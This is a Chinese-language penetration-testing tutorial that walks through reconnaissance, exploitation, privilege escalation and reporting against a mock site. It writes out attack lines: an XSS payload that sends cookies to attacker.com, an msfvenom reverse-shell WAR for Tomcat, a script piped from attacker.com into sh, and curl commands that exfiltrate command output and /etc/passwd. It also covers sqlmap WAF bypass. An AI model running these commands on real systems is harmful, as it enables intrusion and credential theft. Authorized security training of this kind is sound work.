从零构建渗透测试实战框架:流程驱动与漏洞挖掘融合指南

发布时间:2026/7/5 9:53:21
从零构建渗透测试实战框架:流程驱动与漏洞挖掘融合指南 1. 项目概述从零开始构建实战化的安全思维看到这个标题很多刚入门安全领域的朋友可能会觉得既兴奋又迷茫。兴奋的是它承诺了一条从“零基础”到“精通”的清晰路径迷茫的是面对“漏洞挖掘”、“渗透测试”这些听起来高大上的词不知道从哪里下脚。我干了十多年安全从乙方渗透测试工程师到甲方安全负责人带过不少新人深知这条路如果没人领自己摸索起来有多费劲。今天我就以一个过来人的身份把这条路上最核心、最实战的东西掰开揉碎了讲给你听让你收藏这一篇就能建立起一个清晰、可执行的行动框架。所谓“漏洞挖掘”和“渗透测试”听起来像是两个独立的事情但在实战中它们是你中有我、我中有你的关系。你可以把漏洞挖掘看作是“找茬”的过程目标是发现系统中潜在的安全缺陷比如一个没过滤好的输入框可能导致的XSS跨站脚本攻击或者一个权限校验不严的接口可能导致越权访问。而渗透测试则是“验证这个茬能不能被利用来搞破坏”的过程它是一个更系统、更完整的行为模拟遵循着从信息收集到权限提升再到内网横向移动和数据获取的完整攻击链。很多人学了很久还是只会用工具扫几个漏洞报告写得像扫描器日志根本原因就是没把这两者融会贯通没理解背后的攻击者思维。这篇文章的目标就是帮你跨越这个鸿沟。我不会给你罗列几百个工具的名字也不会让你去死记硬背OWASP TOP 10的条目。我要带你做的是构建一套属于你自己的“安全攻防思维操作系统”。无论你是计算机相关专业的学生想转行安全的IT从业者还是对网络安全充满好奇的爱好者只要你愿意动手、勤于思考这篇内容都能为你提供一个坚实的起点。我们会从最基础的环境搭建开始一步步深入到真实的漏洞挖掘场景和完整的渗透测试流程中每一个环节我都会结合我踩过的坑、总结的技巧告诉你“为什么要这么做”以及“怎么做得更好”。2. 核心思路与能力地图拆解在真正动手之前我们必须先统一思想明确学习路径。盲目地东一榔头西一棒子是学习安全技术的大忌。我的核心思路是“以渗透测试流程为骨架以漏洞挖掘技术为血肉”。这意味着我们将以一个标准的、专业的渗透测试流程PTES渗透测试执行标准作为我们学习和实践的主线。在这个主线的每一个阶段我们去深入学习和应用相应的漏洞挖掘技术。2.1 为什么是“流程驱动”而非“工具驱动”新手最容易犯的错误就是“工具崇拜”。觉得装个Kali Linux学会用Nmap、Burp Suite就很厉害了。这大错特错。工具是手的延伸思维才是大脑。一个只会用自动化扫描工具的人永远成不了真正的渗透测试工程师。因为现实中的目标尤其是稍微有点防护的企业系统早就对常见的自动化扫描有了免疫。你需要的是理解攻击的逻辑然后用手头任何可用的工具甚至自己写脚本去实现它。渗透测试流程PTES大致分为七个阶段前期交互、情报收集、威胁建模、漏洞分析、渗透攻击、后渗透攻击、报告编制。对于初学者我们可以将其简化为一个更易理解的五阶段模型信息收集了解你的“战场”。漏洞探测寻找可能的“突破口”。漏洞利用尝试打开“突破口”并进入。权限提升与横向移动进入后扩大战果。痕迹清理与报告撰写优雅地离开并说明问题。我们的学习就将紧紧围绕这五个阶段展开。在每个阶段你需要掌握的不是某个特定工具而是这个阶段的目标、方法论和对应的技术原理。例如在信息收集阶段目标就是尽可能多地获取目标系统的信息域名、IP、子域名、开放端口、服务版本、WAF、员工邮箱等。方法论包括被动信息收集不直接接触目标和主动信息收集。技术原理则涉及DNS解析、网络爬虫、搜索引擎语法等。2.2 零基础者的能力进阶地图基于上述流程我为你绘制了一张能力进阶地图你可以对照检查自己的学习进度第一阶段筑基期1-2个月核心目标熟悉Linux基础命令、网络基础TCP/IP, HTTP/HTTPS、Web基础HTML, JavaScript, 前后端交互。关键动作安装并熟练使用Kali Linux或Parrot OS作为你的主力学习环境。在虚拟机中搭建自己的靶场环境如DVWA、bWAPP、WebGoat这是你安全的“练习场”。学会使用Burp Suite的代理、抓包、重放功能这是你的“瑞士军刀”。避坑指南这个阶段切忌贪多求快。不要一上来就去挖真实的SRC安全应急响应中心漏洞。把靶场里的每一个漏洞类型都亲手复现一遍理解其成因和利用条件比你看十篇漏洞文章都有用。第二阶段实战期3-6个月核心目标深入理解OWASP TOP 10中的每一种漏洞并能在靶场中熟练利用。关键动作漏洞挖掘针对每种漏洞学习其原理、挖掘方法手工工具辅助、利用技巧和修复方案。例如学SQL注入就要明白联合查询、报错注入、布尔盲注、时间盲注的区别和利用场景。流程初体验对一个完整的靶机如Vulnhub、HackTheBox上的初级机器进行从头到尾的渗透。完整走一遍信息收集到获取权限的流程。避坑指南不要满足于“跑通”Payload。多问几个“为什么”为什么这个参数存在注入为什么这个文件能上传修复方案为什么是那样理解原理才能举一反三。第三阶段升华期6个月以上核心目标形成自己的攻击思维和 methodology能够应对复杂的、有防护的真实环境。关键动作参与真实SRC在法律法规允许的范围内对授权范围内的厂商进行漏洞挖掘。这是检验你能力的最佳试金石。学习内网渗透理解域环境、横向移动手法如Pass the Hash, Kerberoasting、持久化控制等。代码审计辅助开始学习简单的代码审计尤其是PHP/Java能从源代码层面理解漏洞这会让你的挖掘能力产生质变。避坑指南严格遵守法律法规和道德底线。只测试你有明确书面授权或属于公开SRC计划范围内的目标。未经授权的测试是违法行为。3. 环境准备与核心工具链解析工欲善其事必先利其器。一个稳定、高效的学习环境至关重要。这里我强烈推荐使用虚拟机方案。在你的Windows或macOS主机上安装VMware Workstation或VirtualBox然后在虚拟机中安装渗透测试专用系统。3.1 操作系统选择Kali Linux 还是 Parrot OS这是新手第一个纠结的问题。两者都是顶级的渗透测试发行版预装了海量工具。Kali Linux行业标准知名度最高社区庞大教程资源极多。它的工具库最全更新及时。对于初学者跟随大多数教程学习时环境一致减少踩坑。缺点是默认使用root用户一些操作习惯可能不利于安全意识的培养。Parrot OS基于Debian界面更现代美观对硬件资源尤其是内存的消耗相对友好一些。它同样预装了丰富的工具并且更注重隐私和加密。它的“安全模式”默认不是root这一点更好。我的选择与建议对于纯新手我建议从Kali Linux开始。因为你在搜索任何问题时得到的解决方案99%是基于Kali的这能极大降低学习初期的环境配置成本。等你对Linux和工具链比较熟悉后可以再尝试Parrot OS或其他发行版。安装完成后第一件事不是急着打开那些炫酷的工具而是做好以下准备更新系统sudo apt update sudo apt upgrade -y配置代理可选但重要很多工具需要从外网下载插件或更新。在虚拟机网络设置中配置好可以避免后续很多麻烦。安装中文输入法如果需要避免报告编写时的不便。快照快照快照在虚拟机配置完成、安装好基础工具后立即创建一个系统快照。以后无论你如何“折腾”系统玩崩了都能一键恢复到这个干净状态。3.2 核心工具链详解你的“兵器库”工具很多但核心的几件必须精通。我按渗透测试流程来归类1. 信息收集阶段子域名发现subfinder,amass,assetfinder。这些是命令行工具效率远高于一些在线网站。可以组合使用比如subfinder -d target.com | httpx快速获取存活的子域名。端口扫描与服务识别Nmap毋庸置疑的王者。不要只会nmap -sS -sV target_ip。要理解各种扫描类型-sS SYN半开扫描-sT TCP全连接扫描-sU UDP扫描的适用场景和优缺点。高级用法如-A全面探测--script使用NSE脚本进行更深入的漏洞探测。目录/文件扫描Gobuster或Dirsearch。用于发现网站隐藏的目录、备份文件、配置文件等。关键点在于使用一个强大的字典如SecLists项目中的字典。网络空间搜索引擎Shodan,Fofa,ZoomEye。这是被动信息收集的利器。你可以搜索特定服务、特定标题或特定漏洞。例如在Shodan中搜索title:“Drupal”可以找到大量Drupal站点结合已知漏洞进行批量分析。2. 漏洞探测与利用阶段Web代理与抓包工具Burp Suite Professional社区版免费功能受限是绝对的核心。它的Proxy、Repeater、Intruder、Scanner模块必须烂熟于心。OWASP ZAP是一个优秀的免费替代品。漏洞扫描器Nessus,OpenVAS。用于进行全面的自动化漏洞扫描。但要记住扫描器只是辅助它会产生大量误报和漏报真正的漏洞需要人工验证。专项漏洞利用工具SQL注入sqlmap。自动化注入神器但务必理解其原理不要当“黑盒”用。文件上传手工测试结合Burp Suite。反序列化ysoserial,JavaDeserH2HC等需要根据语言环境选择。密码破解HashcatGPU加速强大John the Ripper。用于破解获取到的哈希值或弱口令。3. 后渗透阶段远控木马Metasploit Framework中的msfvenom生成meterpreter作为回连载荷。Metasploit是一个庞大的框架初学者容易沉迷于它的“一键getshell”但一定要去理解每个模块背后的利用原理。横向移动与信息收集Impacket套件包含大量用于内网渗透的Python脚本如psexec.py,smbexec.py,secretsdump.py等是内网渗透的瑞士军刀。权限提升检查脚本LinPEAS(Linux),WinPEAS(Windows),Linux Smart Enumeration。这些脚本能自动化检查系统的常见错误配置帮助你快速找到提权路径。工具使用心法永远记住工具是为你服务的。不要被工具限制住思维。当工具找不到漏洞时要回归到手动测试仔细分析应用程序的逻辑。很多时候最致命的漏洞如业务逻辑漏洞、权限绕过是任何自动化工具都发现不了的。4. 实战流程深度剖析以一个模拟场景为例现在我们假设一个目标一个名为testvuln.com的模拟网站。我们将完整地走一遍渗透测试流程我会在每一步穿插讲解漏洞挖掘的思路。4.1 第一阶段信息收集 - 绘制攻击地图信息收集的广度与深度直接决定了后续攻击的成败。这里我们采取“先被动后主动”的策略。被动信息收集Whois查询使用whois testvuln.com或在线网站获取域名注册人、邮箱、电话、注册商等信息。这些信息可能用于社会工程学攻击或发现关联资产。子域名枚举这是关键一步。很多重要的系统如admin.testvuln.com,api.testvuln.com,vpn.testvuln.com可能隐藏在此。# 使用subfinder和httpx组合拳 subfinder -d testvuln.com -silent | httpx -title -status-code -tech-detect -o live_subs.txt这条命令会找出子域名并探测其存活状态、网页标题、状态码和使用的技术栈如Nginx, WordPress, Java等。端口扫描对主域名IP和发现的重要子域名IP进行扫描。nmap -sS -sV -sC -O -p- -T4 -oA nmap_full target_ip-sS: SYN扫描速度快且隐蔽。-sV: 探测服务版本。-sC: 使用默认的NSE脚本进行更深入探测。-p-: 扫描所有65535个端口。-T4: 设置扫描速度0-54为较快。-oA: 输出所有格式nmap, gnmap, xml的结果。 扫描完成后重点分析开放的非常见端口如8080, 8443, 9000等及其服务。主动信息收集目录爆破针对发现的Web服务。gobuster dir -u https://testvuln.com -w /usr/share/wordlists/dirb/big.txt -t 50可能会发现/admin,/backup,/phpinfo.php,/config.txt等敏感路径。指纹识别确定Web框架、中间件、CMS版本。使用Wappalyzer浏览器插件或whatweb命令。例如发现网站使用ThinkPHP 5.0.23立刻联想到该版本是否存在已知RCE漏洞。搜索引擎语法在Google、Fofa中搜索site:testvuln.com filetype:pdf或site:testvuln.com “内部”可能找到泄露的文档或内部页面。信息收集阶段漏洞挖掘点敏感文件泄露通过目录爆破发现的robots.txt,.git/,.svn/,.DS_Store文件可能泄露源代码或目录结构。版本信息泄露HTTP响应头、错误页面、静态文件注释中暴露的详细版本信息可直接关联公开漏洞。子域名接管如果发现的某个子域名如cdn.testvuln.com解析到一个你能够控制的云服务如失效的AWS S3桶、GitHub Pages你就可以接管这个子域名。4.2 第二阶段漏洞探测 - 寻找薄弱环节拿到信息地图后我们开始针对性地探测漏洞。这里以Web应用为主。1. 手动浏览与功能点梳理 打开Burp Suite设置好浏览器代理然后像普通用户一样浏览网站。注册、登录、搜索、上传、下单、查看个人资料……遍历每一个功能。Burp Suite会记录下所有的HTTP请求。这个过程中你要在心里画一张“功能点-输入点”的脑图哪里用户可以输入数据这些数据最终去哪了显示在页面上存入数据库调用系统命令2. 针对输入点的测试SQL注入在每个输入点URL参数、POST表单、Cookie、HTTP头尝试输入单引号‘、双引号“、反斜杠\观察返回结果是否有数据库报错信息。如果有直接用sqlmap深入测试sqlmap -u “http://testvuln.com/item.php?id1” --batch --level 3 --risk 2。XSS跨站脚本在输入点尝试scriptalert(1)/script。但现代网站多有基础过滤需要尝试绕过。存储型XSS要看输入是否在别的页面如留言板展示反射型XSS看输入是否立刻在响应中回显。文件上传尝试上传一个图片抓包然后修改文件扩展名为.php、.jsp或者尝试双扩展名test.jpg.php或者在文件内容开头添加图片魔数如GIF89a再后面跟PHP代码。同时注意修改Content-Type为image/jpeg。命令/代码注入在涉及系统操作的功能点如Ping功能、文件管理尝试拼接命令; whoami或| dir。在模板渲染点尝试{{7*7}}测试SSTI服务端模板注入。3. 业务逻辑漏洞挖掘 这是自动化工具无能为力的领域完全靠人脑。越权访问登录普通用户A抓取查看自己订单的请求GET /order/view?order_id100。尝试将order_id修改为101可能是用户B的订单看是否能访问。这就是水平越权。垂直越权则是普通用户尝试访问/admin/user/list这类管理员接口。验证码绕过验证码是否在客户端生成或校验是否在一次验证成功后后续请求就不再校验是否可以通过重放攻击绕过密码重置漏洞重置密码时用于验证身份的“令牌”是否可预测如基于时间或用户ID是否在第一步验证通过后第二步修改密码时不再验证身份4.3 第三阶段漏洞利用与初始访问假设我们在testvuln.com的搜索功能处发现了一个反射型XSS并且在某个子域名old.testvuln.com的Tomcat管理后台发现了弱口令admin:admin。1. XSS的利用反射型XSS通常需要诱骗用户点击链接。我们可以构造一个利用链接http://testvuln.com/search?keywordscriptfetch(‘http://attacker.com/steal?cookiedocument.cookie)/script。如果用户点击其Cookie就会被发送到我们的服务器。但这需要社工难度较大。我们更关注存储型XSS或能直接打后台的XSS。2. Tomcat后台Getshell这是更直接的突破口。访问http://old.testvuln.com:8080/manager/html用弱口令登录。在部署WAR file to deploy区域上传一个恶意的WAR包。这个WAR包可以用msfvenom生成msfvenom -p java/jsp_shell_reverse_tcp LHOST你的攻击机IP LPORT4444 -f war -o shell.war上传成功后访问http://old.testvuln.com:8080/shell/路径取决于WAR包名同时在你的攻击机上用Netcat或Metasploit监听4444端口。一旦访问就会触发反向连接你获得了一个反向Shell。实战心得在真实环境中Tomcat后台弱口令、Jenkins未授权访问、Redis未授权访问、Docker API未授权访问等都是非常常见且容易利用的“突破口”。信息收集时发现的非常规端口和默认服务一定要重点检查。4.4 第四阶段权限提升与横向移动拿到一个Web Shell可能是www-data或tomcat权限后我们通常在一个低权限的容器或用户环境下。目标是获取最高权限root/Administrator并探索内网。1. Linux权限提升检查上传LinPEAS脚本到目标服务器并执行curl http://attacker.com/linpeas.sh | sh。LinPEAS会自动检查数十种可能的提权路径并高亮显示可疑点。常见的有SUID文件查找具有SUID权限的可执行文件如find / -perm -us -type f 2/dev/null。如果发现/usr/bin/find、/usr/bin/vim等可以搜索其对应的提权方法GTFOBins。内核漏洞使用uname -a查看内核版本搜索该版本是否存在公开的本地提权EXP如DirtyCow。计划任务检查/etc/crontab看是否有以root权限运行的任务调用了我们可写的脚本。环境变量检查PATH变量是否有当前目录.且位于系统路径之前这可能导致劫持。sudo权限运行sudo -l查看当前用户能以root身份无需密码运行哪些命令。2. 横向移动 如果目标在内网我们需要探索其他机器。信息收集在Shell中执行ifconfig或ip addr查看当前机器IP判断所在网段。执行cat /etc/hosts查看主机名映射。执行netstat -antp查看网络连接可能发现与其他内网机器的通信。端口扫描内网将我们的扫描工具如Nmap的静态编译版上传到目标机器对内网网段进行扫描。例如./nmap -sS -p 22,80,443,3306,3389 192.168.1.0/24。密码/哈希抓取尝试从配置文件、数据库连接文件、历史命令中寻找密码。使用mimipenguin或LaZagne等工具尝试从内存中抓取密码哈希。Pass the Hash/Pass the Ticket如果获取到其他用户的NTLM哈希或Kerberos票据就可以在Windows域环境中进行横向移动无需知道明文密码。这需要用到Impacket套件中的工具。4.5 第五阶段报告撰写 - 价值的最终体现渗透测试的最终产出是一份专业的报告。报告写得好不好直接决定了你的工作价值。一份好的报告应该清晰、客观、可操作。报告核心结构概述测试目标、范围、时间、参与人员。执行摘要给管理层看的用非技术语言概括最重要的发现、风险等级和整体安全状况。避免技术细节。详细发现这是报告的主体。每个漏洞必须包含以下要素漏洞标题清晰描述问题如“搜索功能反射型XSS漏洞”。风险等级高、中、低需定义明确标准如可利用性、影响范围。漏洞位置完整的URL或功能点。漏洞描述用技术语言说明是什么问题。重现步骤一步一步像食谱一样让开发人员能按照你的步骤复现漏洞。这是最重要的部分必须包含请求的完整HTTP数据包从Burp Suite复制。每一步的截图。预期的结果和实际的结果。漏洞原理简要说明漏洞产生的根本原因如未对用户输入进行过滤。修复建议给出具体、可实施的修复方案。例如对于XSS应建议“对所有输出到页面的用户输入进行HTML实体编码”。附录测试所用的工具列表、参考链接等。报告撰写心法站在开发人员的角度写报告。他们不是安全专家你的重现步骤必须详尽到“傻瓜式”。一张清晰的截图胜过千言万语。修复建议要具体最好能给出代码示例如使用OWASP ESAPI库进行编码。避免使用恐吓性语言保持专业和建设性。5. 常见问题与排查技巧实录在实际操作中你一定会遇到各种各样的问题。这里我记录了一些高频问题和我的解决思路。5.1 工具使用类问题Q1: Nmap扫描速度太慢或者被防火墙拦截怎么办慢使用-T参数调整时序模板-T4或-T5能显著加快速度但可能不够精确且容易被发现。对于大范围扫描可以先-p 80,443,8080,8443扫描常见Web端口再针对开放端口进行全端口扫描。被拦截尝试不同的扫描技术。-sS(SYN扫描)比-sT(全连接)更隐蔽。如果目标有IDS/IPS可以尝试-f(分片)、--mtu(指定偏移量)、--data-length(附加随机数据) 等规避技术。或者使用-sN(NULL扫描)、-sF(FIN扫描)等但这些在某些系统上不可靠。Q2: Sqlmap跑不出注入点但手工测试明明有报错检查请求用Burp Suite抓包将整个请求包括Cookie、特殊Header保存到文件如req.txt然后用sqlmap -r req.txt来测试。Sqlmap会解析文件中的所有参数。尝试Level和Risk提高检测等级和风险等级--level 3 --risk 3。Level越高测试的参数越多如HTTP头。Risk越高测试的Payload越危险可能造成数据破坏慎用。使用Tamper脚本如果网站有WAF需要使用Tamper脚本绕过。例如--tamperspace2comment。可以组合使用--tamperspace2comment,charencode。确认注入类型如果是时间盲注Sqlmap默认可能不检测需要指定--techniqueT。Q3: Burp Suite抓不到手机APP或某些客户端的包证书问题确保已在客户端手机或PC安装并信任了Burp Suite的CA证书。对于Android 7.0以上需要将证书安装到系统证书目录这通常需要root权限。另一种方法是在虚拟机或模拟器中测试。代理设置确保客户端配置的代理IP和端口与Burp Suite监听的一致。对于APP它可能硬编码了忽略系统代理此时需要借助像PosternAndroid这样的全局代理工具或者使用Fiddler等支持透明代理的工具。HTTPS拦截在Burp Suite的Proxy - Options - TLS中确保勾选了“Generate a CA-signed certificate with a specific hostname”并正确配置。5.2 漏洞挖掘与利用类问题Q4: 明明存在漏洞如已知框架的RCE但利用不成功环境差异公开的EXP可能针对特定版本或特定配置。检查目标版本是否完全匹配。查看EXP代码理解其利用原理根据目标环境进行修改。例如某个ThinkPHP RCE需要特定的路由模式开启。WAF/防护软件拦截利用被WAF拦截。尝试对Payload进行各种编码、混淆、分块传输Chunked来绕过。使用Burp Suite的Intruder模块加载编码字典进行Fuzz测试。出网限制目标服务器无法访问外网导致反向Shell无法连接。此时需要尝试正向连接Bind Shell即让目标监听一个端口我们主动连接上去。或者寻找不出网的利用方式如写入Webshell。Q5: 拿到一个Shell但很快就被中断或者执行命令没回显Shell稳定性使用Python、Perl、PHP等语言快速建立一个更稳定的TTY Shell。# 在获得的简陋Shell中尝试 python -c import pty; pty.spawn(/bin/bash) # 或者 /bin/bash -i # 或者使用socat、script等工具无回显Blind命令执行这是命令注入的常见情况。可以通过时间延迟、DNS外带、HTTP请求外带等方式判断命令是否执行并获取结果。时间盲注ping -c 10 127.0.0.1如果执行成功会有10秒延迟。DNS外带curl http://whoami.attacker.com将命令执行结果作为子域名发出在攻击机的DNS日志中查看。HTTP外带curl http://attacker.com/cat /etc/passwd | base64 将结果Base64编码后作为请求参数或路径发出。5.3 学习路径与心态类问题Q6: 看了很多教程但自己动手还是没思路怎么办回归靶场这是最有效的办法。从DVWA这种每个漏洞都有明确分级的靶场开始将安全级别从Low调到High逐一攻克。然后挑战Vulnhub、HackTheBox上的综合靶机逼自己整合所有知识。参与CTF比赛线上CTF如CTFtime上列出的比赛是锻炼实战能力的绝佳场所尤其是解题模式Jeopardy的Web题。阅读漏洞报告在各大SRC平台、HackerOne、CVE详情页阅读高质量的漏洞报告学习别人的挖掘思路和技巧。建立自己的知识库用笔记软件如Obsidian、Notion记录每一个你复现的漏洞、每一个新学的工具命令、每一个踩过的坑。定期回顾形成肌肉记忆。Q7: 如何获得实战机会又不违法漏洞众测平台国内外的众测平台需审核资质是合法的实战渠道。开源项目/软件对知名的开源项目进行安全审计发现漏洞后负责任地披露这是备受推崇且能积累声誉的方式。自己搭建实验环境在虚拟机中用Docker Compose搭建一个模拟的企业网络环境包含域控制器、Web服务器、数据库等进行全流程的内网渗透练习。这条路没有捷径它需要持续的热情、大量的动手实践和不断的思考总结。工具和技巧会过时但扎实的基础知识网络、系统、Web和严谨的攻防思维永远不会过时。从今天起关掉那些浮夸的“一分钟黑客”视频打开你的虚拟机从第一个靶场、第一个漏洞开始亲手去敲下每一个命令去分析每一个数据包。当你第一次独立从信息收集开始最终拿到一个靶机的root权限时那种成就感是无与伦比的那才是你真正入门